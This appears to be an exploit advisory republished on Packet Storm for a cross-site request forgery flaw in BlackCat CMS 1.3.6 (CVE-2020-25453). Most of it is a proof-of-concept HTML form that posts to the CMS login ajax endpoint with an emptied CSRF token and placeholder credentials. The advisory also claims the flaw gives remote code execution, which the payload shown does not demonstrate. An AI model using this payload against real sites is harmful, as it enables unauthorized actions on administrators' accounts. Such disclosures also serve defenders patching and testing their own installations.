BlackCat CMS version 1.3.6 suffers from a cross site request forgery vulnerability.
b357b4740c79899cf76358887a76b53060714f53efb12a16879b0ef3a7d24388# Exploit Title: BlackCat CMS 1.3.6 - Cross-Site Request Forgery
# Date: 2020-06-01
# Exploit Author: Noth
# Vendor Homepage: https://github.com/BlackCatDevelopment/BlackCatCMS
# Software Link: https://github.com/BlackCatDevelopment/BlackCatCMS
# Version: v1.3.6
# CVE : CVE-2020-25453
BlackCat CMS v1.3.6 has a CSRF vulnerability (bypass csrf_token) that
allows remote arbitrary code execution .
PoC (Remove the csrf_token value) :
<input type=“hidden” name=“__csrf_magic” value=“”/>
-------------------------------------------------------------------------------------------------------------------------------------------------
<html>
<body>
<script>history.pushState(",",'/')</script>
<form action=“
http://127.0.0.1/blackcatcms-release-1.3/backend/login/ajax_index.php
”method=“POST”>
<input type=“hidden” name=“__csrf_magic” value=“”/>
<input type=“hidden” name=“username_fieldname”
value=“username_274807982ed4”/>
<input type=“hidden” name=“password_fieldname”
value=“password_75868428f837”/>
<input type=“hidden” name=“_cat_ajax” value=“1”/>
<input type=“hidden” name=“username_274807982ed4” value=“accountname”/>
<input type=“hidden” name=“password_75868428f837” value=“yourpassword”/>
<input type=“submit” value=“Submit request”/>
</form>
</body>
</html>
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed